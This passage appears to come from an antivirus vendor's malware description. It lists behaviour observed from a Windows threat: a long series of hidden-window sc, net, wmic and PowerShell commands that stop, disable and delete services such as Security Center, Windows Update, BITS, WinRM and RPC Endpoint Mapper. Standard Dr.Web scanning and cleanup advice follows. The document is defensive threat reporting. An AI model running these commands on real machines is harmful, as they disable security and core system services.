  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WMPNetworkSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WMPNetworkSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop RemoteRegistry' (with hidden window)
  • '<SYSTEM32>\sc.exe' config RemoteRegistry start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete RemoteRegistry' (with hidden window)
  • '<SYSTEM32>\net.exe' stop RemoteRegistry /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RemoteRegistry' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RemoteRegistry' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RemoteRegistry'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop wscsvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config wscsvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete wscsvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop wscsvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wscsvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wscsvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wscsvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WinHttpAutoProxySvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WinHttpAutoProxySvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WinHttpAutoProxySvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WinHttpAutoProxySvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinHttpAutoProxySvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinHttpAutoProxySvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinHttpAutoProxySvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop BITS' (with hidden window)
  • '<SYSTEM32>\sc.exe' config BITS start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete BITS' (with hidden window)
  • '<SYSTEM32>\net.exe' stop BITS /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'BITS' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'BITS' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'BITS'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop wuauserv' (with hidden window)
  • '<SYSTEM32>\sc.exe' config wuauserv start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete wuauserv' (with hidden window)
  • '<SYSTEM32>\net.exe' stop wuauserv /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wuauserv' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wuauserv' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wuauserv'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop MSiSCSI' (with hidden window)
  • '<SYSTEM32>\sc.exe' config MSiSCSI start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete MSiSCSI' (with hidden window)
  • '<SYSTEM32>\net.exe' stop MSiSCSI /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSiSCSI' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSiSCSI' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSiSCSI'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop StorSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config StorSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete StorSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop StorSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'StorSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'StorSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'StorSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop DPS' (with hidden window)
  • '<SYSTEM32>\sc.exe' config DPS start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete DPS' (with hidden window)
  • '<SYSTEM32>\net.exe' stop DPS /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DPS' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DPS' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DPS'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WdiServiceHost' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WdiServiceHost start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WdiServiceHost' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WdiServiceHost /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiServiceHost' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiServiceHost' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiServiceHost'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WdiSystemHost' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WdiSystemHost start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WdiSystemHost' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WdiSystemHost /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiSystemHost' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiSystemHost' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiSystemHost'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WpnService' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WpnService start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WpnService' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WpnService /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WpnService' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WpnService' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WpnService'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop PcaSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config PcaSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete PcaSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop PcaSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'PcaSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'PcaSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'PcaSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop SysMain' (with hidden window)
  • '<SYSTEM32>\sc.exe' config SysMain start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete SysMain' (with hidden window)
  • '<SYSTEM32>\net.exe' stop SysMain /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SysMain' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SysMain' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SysMain'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WSearch' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WSearch start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WSearch' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WSearch /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WSearch' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WSearch' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WSearch'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WbioSrvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WbioSrvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WbioSrvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WbioSrvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WbioSrvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WbioSrvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WbioSrvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WlanSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WlanSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WlanSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WlanSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WlanSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WlanSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WlanSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WwanSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WwanSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WwanSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WwanSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WwanSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WwanSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WwanSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WinRM' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WinRM start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WinRM' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WinRM /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinRM' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinRM' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinRM'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop W3SVC' (with hidden window)
  • '<SYSTEM32>\sc.exe' config W3SVC start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete W3SVC' (with hidden window)
  • '<SYSTEM32>\net.exe' stop W3SVC /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'W3SVC' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'W3SVC' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'W3SVC'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop IISADMIN' (with hidden window)
  • '<SYSTEM32>\sc.exe' config IISADMIN start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete IISADMIN' (with hidden window)
  • '<SYSTEM32>\net.exe' stop IISADMIN /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'IISADMIN' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'IISADMIN' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'IISADMIN'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop MSMQ' (with hidden window)
  • '<SYSTEM32>\sc.exe' config MSMQ start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete MSMQ' (with hidden window)
  • '<SYSTEM32>\net.exe' stop MSMQ /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSMQ' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSMQ' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSMQ'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop RpcEptMapper' (with hidden window)
  • '<SYSTEM32>\sc.exe' config RpcEptMapper start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete RpcEptMapper' (with hidden window)
  • '<SYSTEM32>\net.exe' stop RpcEptMapper /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RpcEptMapper' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RpcEptMapper' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RpcEptMapper'"' (with hidden window)

Treatment recommendations

  1. If the operating system can be started (in normal mode or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of all the removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be started, change your computer's BIOS settings to boot from a CD/DVD or a USB drive. Download the image of the Dr.Web® LiveDisk system recovery disk or the utility for writing Dr.Web® LiveDisk to a USB drive, then prepare the appropriate USB drive. Boot the computer from this drive, run a full scan, and cure the detected threats.

Run a full system scan using Dr.Web Antivirus for Mac OS.

Run a full scan of all disk partitions using Dr.Web Antivirus for Linux.

  1. If your mobile device is working correctly, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations for neutralizing the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the device's screen), proceed as follows:
    • start your smartphone or tablet in safe mode (if you do not know how, consult the device's documentation or contact the manufacturer);
    • then download and install Dr.Web for Android on your mobile device, run a full scan, and follow the recommendations for neutralizing the detected threats;
    • unplug your device and plug it back in.

Learn more about Dr.Web for Android